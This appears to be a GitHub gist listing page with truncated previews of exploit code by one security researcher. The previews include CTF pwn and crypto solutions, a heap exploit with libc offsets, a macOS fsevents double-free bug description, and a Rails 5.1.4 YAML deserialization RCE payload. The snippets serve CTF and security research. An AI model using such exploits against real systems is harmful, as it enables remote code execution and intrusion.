Skip to content

Instantly share code, notes, and snippets.

View gist:b5280bc856bfc94157b760eb962e7b60
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
@niklasb
niklasb / railspwn.rb
Last active Mar 7, 2021
Rails 5.1.4 YAML unsafe deserialization RCE payload
View railspwn.rb
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
@niklasb
niklasb / gracias.py
Last active Jul 15, 2019
Crypto solutions ASIS CTF finals
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777
View handicraft.py
from sage.all import *
import base64
def factor(n,b):
M=1
print 'start'
a = 2
i=0
for q in primes(b):
i+=1
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777
View ctfzone_pwn.py
# First stage: unsafe unlink
# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption
from pwn import *
import struct
import sys
offset_close = 0x00000000000f78b0
offset_env = 0x3c6f38
@niklasb
niklasb / sigserver.py
Created Jul 17, 2017
Solution for signature server from CTFZone 2017
View sigserver.py
# Implementation based on attack from
# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf
import socket
import telnetlib
import random
from hashlib import sha1
from sage.all import inverse_mod, matrix, vector
TARGET = ('185.143.173.36', 1337)
sock=socket.create_connection(TARGET)
View gist:416b333cb973812b39c085a42f5c19c4
The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0.
static int
fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx)
{
fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data;
int ret = 0;
fsevent_dev_filter_args64 *devfilt_args, _devfilt_args;
OSAddAtomic(1, &fseh->active);
@niklasb
niklasb / robot_pwnage.py
Last active Aug 6, 2017
Exploit for 'wheel of robots' from insomni'hack 2017
View robot_pwnage.py
import time
# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py
from pwnlib.tools import *
TARGET=('localhost',5000)
INTERVAL=0
offset_free = 549184
offset_system = 0x456d0
@niklasb
niklasb / baby.py
Created Jan 22, 2017
exploit for 'baby' from Insomni'Hack Teaser 2017
View baby.py
import socket
import telnetlib
import time
import struct
import sys
TARGET=('localhost', 1337)
offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0